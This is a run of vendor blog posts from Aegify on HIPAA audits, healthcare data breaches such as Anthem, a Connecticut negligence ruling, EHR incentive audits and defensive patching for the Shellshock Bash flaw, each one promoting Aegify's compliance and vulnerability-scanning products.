The post HIPAA Audit: OCR Is On The Move appeared first on Aegify.

Phase 2 audits will be conducted by OCR staff and will likely involve a different methodology than previous audits. Unlike the comprehensive Phase 1 audits, Phase 2 audits will be more narrowly focused. OCR intends to audit 350 covered entities and 50 business associates. Concentrating on compliance with requirements related to the notice of privacy practices and patient access to protected health information, the OCR will audit 100 covered entities on the Privacy Rule.  For the first time, business associates are to be included in these audits.  OCR will request a list of business associates from covered entities.

OCR has implied that the Phase 2 and future audits’ adverse findings could lead to civil monetary penalties or a resolution agreement. The estimated “Round 2” of Phase 2 audits and those conducted in 2016 and beyond, are likely to focus on device and media controls, transmission security, Privacy Rule safeguards, encryption and decryption, physical facility access controls, breach reports, and complaint processes. However, there may be a significant impact on how the audit program ties to enforcement because OCR leadership is likely to change soon.

OCR will audit 150 covered entities on security focusing on risk analysis and corresponding risk management. The OCR learned in Phase 1 that with no address confirmation, a hard copy audit notification can drag on indefinitely. In response, last year the OCR gathered information from more than 550 covered entities. Unlike Phase 1, for now OCR does not intend for Phase 2 audits to include on-site visits, but this is subject to review.

Prepare for Your Office for Civil Rights Phase 2 Audit

The best way to prepare for a HIPAA audit is to complete document your privacy and security strategy, using the Aegify documentation management system.

If HIPAA compliance auditors discover an organization cannot produce adequate documentation, logically they’ll suspect subpar compliance efforts. Healthcare organizations need the following documents ready:

• Security and privacy policies and procedures
• Risk assessment and corrective action plan
• Organizational chart outlining privacy and security responsibilities
• Technology inventory, including all security tools used
• Business associate agreements
• Incident response plan
• HIPAA compliance training materials

Click HERE to discover how Aegify prepares companies for their OCR Phase 2 audits.

The post Prepare for “Phase 2” HIPAA Audits appeared first on Aegify.

This incident is a stared reminder for the need for a systematic risk analysis and risk management system for the techno-centric healthcare establishments and business associates. Even as experts look into lack of encryption as a major cause of breach, data encryption is no silver bullet against data breaches.

The Anthem data breach is a cautionary call to all healthcare businesses for addressing the need to ensure compliance to security controls as detailed under the HIPAA/HITECH regulations.

Conclusion
While recent investigations point towards “backdoor malware” as also a cause for such large scale data breach at Anthem Inc, intelligent continuous monitoring and analysis system would have been able to detect the Anthem attack very early. Aegify Security Posture Management tool is optimized to prevent exploits across the entire IT infrastructure. Its unique flexible cloud-based architecture not only scans single as well as multiple assets, its enterprise-class protection scans for more nearly 32,000 vulnerabilities using about 92,000 checks across physical and virtual networks, operating systems, databases, and Web applications. Moreover, it’s automated compliance mapping system deployed across physical and virtual network environment ensures continuous monitoring of security, risk, and compliance with real-time status. The Security Posture Assessment and Management Tools will help enterprises protect their data from such breaches.

The post Anthem Breach Sounds Security Alarms against Data Hackers appeared first on Aegify.

The past year had seen enterprises and individuals from various industries falling prey to data breaches and HIPAA compliance failures more so from the healthcare industry. The office for Civil Rights (OCR) has therefore taken stern steps to ensure privacy and security of data across enterprises in 2015. Since the OCR wants to ensure that enterprises, medical practitioners, their business associates and covered entities take proactive steps to ensure compliance to Health Insurance Portability and Accountability Act, they intend to use HIPAA audit Program randomly across enterprises to check for compliance levels. With HIPAA audits in the horizon, enterprises need to institute smart practices and be audit ready.

The increase in HIPAA audits is a part of a stimulus and any complaint of security breach that involves more than 500 people are sure to trigger an audit. So even employers across other industries also need to take proactive steps to be compliant to these regulations, without which they are also liable to hefty fines.

Understanding some of the common pitfalls will help enterprises to avoid the same during HIPAA audits of 2015. These mistakes include:

• Non-compliance with the Security Rule by not updating and encrypting documents and overlooking associate agreements.
• Failures to implement security risk assessment and compliance programs that help employees understand the need for security of PHIs which include vital information and payment card data.
• Non-establishment of security programs that will ensure proactive monitoring of security and performance indicators and failure to continuously train and retrain employees with critical access on documenting processes of the vital data and EHR
• Failure to update Privacy Practices
• Ignoring privacy laws that interact with HIPAA

With OCR using HIPAA audit program to randomly assess covered entities and their business associates for compliance with the HIPAA privacy, security and breach notification rules, they must have a proactive approach to audits. As a step towards this, enterprises need to ensure that their plan is documented and well communicated across the various entities across the organization.

With regulators favouring a risk-based approach, enterprises need to make use of Security and Compliance programs such as Aegify, that will help them evaluate the risks and vulnerabilities in their environments. While this will implement security controls that will address these issues it will also prepare their business to face OCR as and when it reaches them.

The post Common mistakes to avoid to be guarded from HIPAA Audits and Penalties in 2015 appeared first on Aegify.

Physicians who have had to compromise their Drug Enforcement Administration(DEA) number or have faced investigations from government will understand the need to use measures to protect the electronic health information of their patients and avoid HIPAA penalties in 2015. Further, as an after effect of the changes to HIPAA Omnibus Rule, the HHS Office of civil Rights has taken measures to scrutinise medical practitioners who move away from their directive to ensure privacy of patient data. Moreover, physicians need to understand that depending on the conduct of violations, this may vary from $100 to $50,000 per violation. Also that in case the violation results from “wilful neglect” the practitioners or their business associates involved will have to pay penalties to the tune of $10,000 to $50,000 per violation.

Professionals from the healthcare industry need to be very careful of the ways they handle their patient’s data. Even loss of physician’s personal laptops containing PHI’s may lead to numerous violations. Hence professional who face such circumstances will also be subjected to penalties on the basis of failure to implement protective measures to EHR. The covered entities are also supposed to report such breach cases to the affected parties as well as to HHS.

While HIPAA imposes regulations and restrictions on the medical practitioner, it also offers covered entities various ways to avoid HIPAA penalties. In case the breaches of protective health information is not an act of “wilful neglect” and the covered entities are ready to take up corrective measures within a period of one month then there are chances that they may avoid HIPAA penalties. Further, to mitigate resulting liability under the HIPAA rules and avoid penalties rising from breaches of EHR, the physicians need to conduct regular security risk assessments and implement administrative and technical safeguards. Moreover, executing business agreements with their business associates and providing their employees with effective training to monitor their performance, and documenting these actions will help covered entities to avoid HIPAA penalties. In the event of any breach, timely reporting is critical, as otherwise it will be construed as a wilful neglect as much as it is important to respond immediately to any suspected breach.

Conclusion
Integrating technological innovations may make 2015 a dynamic year for the healthcare industry. Nevertheless, physicians also need to take up adequate steps to maintain practice revenues and be compliant to HIPAA regulations. Aegify is a continuous security monitoring and compliance management solution that is built on a framework approach that allows physicians, covered entities and business associates to gain control and improve compliance across a number of regulations including HIPAA & HITECH and other country-specific ones. Its built-in vulnerability scanning technology is a simple and effective way of monitoring the security and meaningful use-approved HIPAA compliance levels with professional results.

The post How Physicians can Avoid HIPAA Penalties in 2015 appeared first on Aegify.

As a result of releasing the medical records to a third party, by Avery Center for Obstetrics and Gynecology, the patient’s ex-boyfriend viewing her “highly sensitive” health records, used them to harass, embarrass and extort her. While HIPAA doesnot allow individuals to file lawsuit to claim violation of their privacy under the HIPAA regulations, the plaintiff in the Connecticut case alleges that the clinic was negligent when it  released confidential health records instead of protecting the patient’s information, a violation of HIPAA. Since the Connecticut Supreme Court ruling allowed for negligence claim for the alleged violations of HIPAA privacy standards, attorneys are explaining the HIPAA ruling.

However, health data breach lawsuits filed under statutes other than HIPAA required plaintiffs to show the impact of the breach. The case against Sutter Health was one such case which was dismissed by courts as plaintiffs failed to show evidence of harm  such as identity theft or fraud, caused by the breach. Nevertheless, even under HIPAA ruling the impact of breaches on victims plays a vital role while alleging HIPAA negligence. Therefore standards set forth in HIPAA both for privacy and data breaches calls enterprises to place regular safegaurds to protect patient information.

The healthcare establishments today receive heightened attention from regulatory bodies enforcing penalties for data breaches. The Connecticut Supreme Court through its ruling   in the Byrne case sends a clear message to the healthcare providers and their business associates to keep away the practice of  poor encryption and put in place an appropriate program to prevent any data breaches. In case they fail to follow HIPAA, ruling leaving an impact on breaches, they face legal risks.

With the HIPAA Omnibus Rule effectvie since 2013, business associates and covered entities handling patient health information are directly responsible for HIPAA compliance and must encrypt data and avoid mistakes of exposing data. Besides, the use of Aegify security and compliance monitoring system will ensure these covered entities, a continuous security monitoring and effective compliance that demystifies the complex compliance regulations. Since the Aegify solutions addresses the security and compliance requirements of covered entities as well as business associates, individuals can be assured that their private healthcare data remains safe and secure.

The post Understanding HIPAA Ruling and its Impact on Breaches appeared first on Aegify.

The HIPAA Privacy rule was aimed to protect the privacy of individually identifiable health information. Along with this the OCR also brought out the HIPAA Security Rule, which sets national standards for the security of electronic protected health information. The HIPAA Breach Notification Rule requires covered entities and business associates to notify following a breach of unsecured protected health information and the confidentiality provisions of the Patient Safety Rule that protect identifiable information used to analyse patient safety events and improve patient safety.

HIPAA is a set of complex federal rules and regulations that govern how medical institutions and their business associates treat private health information. With penalties for HIPAA violations being substantially high, legal experts are analysing the impact of Connecticut Supreme Court’s ruling whether plaintiffs can sue a healthcare provider for negligence if HIPAA regulations have been violated by not protecting the privacy of patients. As per the HIPAA Security Rule, OCR has set national standards for the security of protected health information (PHI) that is created, stored, transmitted, or received electronically.

However, as methods to ensure the confidentiality, integrity, and availability of ePHI data, the HIPAA Security Rule requires medical practitioners, covered entities, business associates and consumers to implement a series of administrative, physical, and technical safeguards when working with ePHI data. The Connecticut case of Emily Byrne vs. Avery Centre for Obstetrics and Gynaecology which involved a patient who sued a healthcare clinic that released her medical records to a third party without her authorization, falls into one of 10 types of HIPAA violation. Failure to comply with HIPAA requirements leads to civil and criminal penalties that applies to both covered entities and individuals.

The covered entities and business associates should therefore take adequate steps to ensure that the patient data is safe from any sort of data breach. The HIPAA/HITECH Security and Compliance management solution, Aegify, is a continuous security monitoring and compliance management solution that is built on a framework approach and allows covered entities and business associates to gain control and improve compliance levels across HIPAA, HITECH, PCI, SOX, ISO, COBIT including country-specific regulations. Its built-in vulnerability scanning technology makes security and compliance monitoring simple and effective and is designed to facilitate both large hospitals as well as small and medium healthcare establishments and their business associates to continuously monitor security of PHI against any data breaches.

The post Don’t let ePHI make your business another Connecticut case of HIPAA Negligence appeared first on Aegify.

With the federal money flowing in the form of EHR incentive program, hospitals, providers, vendors and consultants are working their way to a meaningful use of EHR. Nevertheless, if a hospital or medical practitioner accepts the federal money to put EHR to meaningful use, they must also prove it by using appropriate electronic tools as per the norms put across by the Center of Medicare and Medicaid Services. Further, incidents such as those that occurred at Shelby Regional Medical Center in Texas, and Detroit Medical Center that led to heavy data leakage and financial loss, demands that the healthcare providers, their business associates and vendors consider meaningful use of electronic patient health records as a compliance requirement. In the wake of such requirement, the eligible professionals, hospitals, and critical access healthcare centres were asked to maintain relevant documentation to support this activity.

Besides, as Daniel R. Levinson, U.S. inspector general points out, among the important changes that are taking place across the healthcare industry there is an emphasis on coordinated care and increased use of electronic health records. The OIG will therefore need to adopt oversight approaches that are suited to an increasingly sophisticated healthcare system and also customizable to protect programs and patients from existing and new vulnerabilities. The OIG audits till date have discovered that the state agency overpaid 13 hospitals, $3.1 million in federal EHR cash. The payment errors were found to be the result of unclear and incorrect patient volume calculations. Further, nearly 80 % of the state’s hospitals analyzed in the audit also failed to comply with federal regulations.

By 2015, OIG will therefore need to leverage data analytics and “forensic enhancements” to investigate the increasingly sophisticated healthcare frauds, including the electronic health records in the process.

The OIG authorities will not only perform audits of various covered entities receiving the EHR, but will also look into factors such as:

• Identify EHR system fraud and determine if  EHR systems address vulnerabilities
• Review Medicaid and Medicare EHR incentive payments
• Analyze the IT security of community health centers funded by the Health Resources and Services Administration.
• Regular review of the Centers for Medicare & Medicaid Services health information technology systems to cross check on necessary security controls.

Besides these, conducting mock audits will help the healthcare providers to stay prepared to face both pre-payment and post-payment audits. However, it is also prudent for enterprises to implement a comprehensive and an effective solution. Security solution like the Aegify Security Posture Management or Aegify SecureGRC offered by the leading service providers of IT Risk and Compliance management solutions will help the healthcare establishments to achieve meaningful use status with ease, while ensuring a near to nil breach of security protocol.

The post Healthcare Industry gears up to meet the EHR Audits in the New Year appeared first on Aegify.

To control such loss of data, governments stressed on HIPAA and HITECH Act compliance as a mandatory feature of the electronic health information exchange. The medical practitioner working through a digital environment therefore deploys systems for risk assessment and encryption of data. However, besides the doctors, and healthcare professionals, there are insurers, transcribers, pharmacologists and practice management services who also access EHI. Under such circumstances, even if the doctors adhere to the HIPAA compliance requirements, data breaches may also result from any loopholes present in the systems of contractors and business associates.

With incidents of large number of data loss cases resulting due to loopholes in third party providers systems, the US government recently brought in changes to HIPAA Act that extends and imposes the privacy and security requirements on business associates and covered entities. The recent incident, where 11 hospitals of a major health system failed to qualify as per the certification of EHR systems and had to return $31 million in meaningful use payments, brings to light that non-compliance to HIPAA and HITECH even by the BA’s might also jeopardize a professionals medical practice. Studies from the Office of Civil Rights supports this by showcasing that 45% of healthcare providers and covered entities have data breaches of which two-thirds of the incidents involve business associates.

Bound by severe financial impact both for the patient and the health care providers, healthcare entities should take up proactive steps to ensure that their medical practices are not put to risk. With the healthcare industry working on a globalized platform, it is not always easy to monitor the global BA’s and their security systems on their devices even with a business associate agreement in place. To ensure that these BA’s comply with the HIPAA security rules, the HIPAA Omnibus Rule addresses the privacy and security requirements. While the HIPAA/ HITECH compliance requires covered entities to implement controls and safeguards to protect health information, the HIPAA Omnibus rule demands an increased focus on the way covered entities work in conjunction with their Business Associates.

Enterprises from the healthcare sector should therefore make use of technologies that will help them to continuously monitor the security and compliance levels of Business Associates on a global scale. Solutions such as Aegify SecureGRC, a IT compliance management and continuous security monitoring solution are built on a framework approach and allows enterprises to control and improve compliance levels across more than 400+ regulations and covers HIPAA, HITECH, PCI, SOX, ISO, COBIT and other country-specific regulations. The built-in vulnerability scanning technology facilitates effective security and continuous monitoring. This ensures compliance to various regulations across various locations and demystifies the complexity of the compliance challenges.

The post A disruption-free Medical Practice in a BA dependent industry appeared first on Aegify.

Use of enhanced technology facilitates them to provide access to vital data across regions for better and faster clinical understanding and increased patient care. Nevertheless, the increase in mobility and accessibility are sadly also the reasons for these organizations being challenged by data breaches. The most recent experience being that of Community Health Systems earlier this year, where the Chinese hackers are believed to have taken advantage of the Heartbleed Open SSL vulnerability and gained access to the data of 4.5 million patients of the hospital chain. Such incidents clearly indicate the wide range of risks faced by the healthcare sector.

A close study by HHS on the breaches showcase hacking as the cause of at least 89 major breaches since 2009; security experts are of the opinion that these incidents are becoming more common posing bigger threats. Besides hacking, insider threats and lack of encryption also cause data breaches. The increase in digitally stored patient information has seen insider threats growing substantially. Though IT leaders work to harden perimeter security the defences, the threat prone environment calls the healthcare organization to take up proactive measures to mitigate the risk posed by the Bash flaws known as Shellshock.

While Shellshock refers to security vulnerabilities in the Bourne-again shell system software known as Bash, it is a common line interface that is used across Unix based systems, including Linux and Apple’s MAC OS. Since Bash exists across the Internet in web servers, email servers, standalone systems, physical security systems, routers and even web cams, researchers are identifying new Shellshock attacks in the wild on a daily basis.

There is every possibility of attackers exploiting the Shellshock flaw to execute shell commands remotely and potentially taking control of the systems in the healthcare sectors. Through the process attackers would dump the stored data and launch automated worms to exploit the vulnerability of a Bash system in a network. Security experts therefore call enterprises across this sector to use systems that can scan Bash flaws and mitigate risks. Most healthcare establishments carry out periodic self-assessment and risk analysis as vital activities to prevent breaches.

However, advanced security solutions such as Aegify SecureGRC  and Security Posture Management facilitates these enterprises with an ideal platform to identify this vulnerability and take necessary measures to secure their environment from data breaches.

As a healthcare organization you need to,

• Work with vendors to identify all systems that need patching, such as those running Unix, Linux, Mac OS X, and as well as Windows
• Monitor and assess all technology dependent medical devices and network devices for patching
• Patch Internet-facing systems first as this is the crucial source of Bash flaws
• Continuously monitor logs and network traffic over a period to help identify any potential compromised systems

However, as with HIPAA compliance, to ensure complete security, both covered entities and business associates also need to take up proactive measures to handle Shellshock issues, address vulnerabilities and data breaches.

Aegify Security Posture Management, an innovative and completely cloud-based automated and integrated security monitoring and compliance assessment tool helps the healthcare entities to take away the complexity of security posture and compliance management. This tool simplifies the protection of their physical and virtual environment and IT infrastructure from security breaches by cyber attackers while also meeting regulatory requirements. Equipped with distinct features such as continuous security monitoring, vulnerability management engine, physical and virtual network scans, interoperability, re-mediation and multi-layered vulnerability analysis, Aegify’s security solutions provides a complete end-to-end and comprehensive solution to identify security gaps and help enterprises apply related patches or use virtual patching.

The post Shellshock – New Vulnerability that Healthcare Sector must address now appeared first on Aegify.